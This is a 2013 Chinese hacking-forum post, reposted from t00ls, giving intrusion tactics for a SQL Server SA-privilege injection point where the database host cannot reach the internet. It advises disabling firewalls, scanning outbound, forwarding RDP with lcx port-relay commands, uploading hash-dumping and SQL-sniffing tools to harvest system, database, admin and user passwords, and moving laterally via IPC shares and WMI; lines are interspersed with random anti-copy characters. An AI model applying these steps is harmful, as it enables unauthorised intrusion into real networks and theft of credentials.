当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。$ B+ q0 o! _, G7 i# p3 h# Y
! d/ V% T; F6 u
4 K3 |# l- q7 D) E8 e- t" f* C& n- m9 q) R
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
: B1 C9 C2 ]6 @# w& v! X
3 a8 v5 G. @9 W' Z, S8 X( Z6 X6 H
一、DB机有公网IP.6 j! _& U+ I3 F: I+ U
+ \ j' C% [, \! _& A
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
" f' O2 k$ e2 w8 o7 Q, z/ L6 b0 X f: k9 w5 r
6 Q5 C0 \1 R6 G/ K7 @: T2 z% |# L2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.: V* ?8 C( {' F0 A
- l+ E V+ E% l/ \& a6 M* ?! P2 B9 M' k
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
; [' y! D b4 J& u% f
" Y& q5 ?. c& V* D, z# w3 T' S. P0 P5 y. M. E) p$ z8 z
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.* c2 D8 W" m) \ K
/ E8 a) m, \6 ^
c$ C1 u8 }" Y9 X, u c" N
- C2 u p, M, L8 b% v [/ ?5 R二、DB机只有内网IP4 F: G/ H1 X: Y; U9 d; V4 t/ W" B2 `/ \
+ T7 i% L! Y' \' C8 M* R1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
8 q+ b, C2 C* Z3 h
* t" q& z/ h0 ^
, Z& [- R+ p7 a( X2:停掉防火墙和IP策略再从内往外扫描.9 S2 q) T( \ L* D% o$ j) m
; T) M8 L. A9 m. u! @" G8 e/ ^1 c% R3 Z9 b
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
- I2 l, f$ F2 t3 r5 O1 B
1 j; Y, J6 p: j) j& d
$ `2 t& T: _/ g, p- w8 [2 T* b6 a+ O4:学会密码规律分析往往会有惊喜.
T2 y# q- R5 P1 w$ f5 L( K6 @1 m) Z) E
_- p: p# i5 k& |# W
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ U3 h) `$ i2 V. `- Q9 B' A' V9 R
h) P5 `2 v5 \+ d8 E$ Y$ ]* j* G; g' G2 l
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对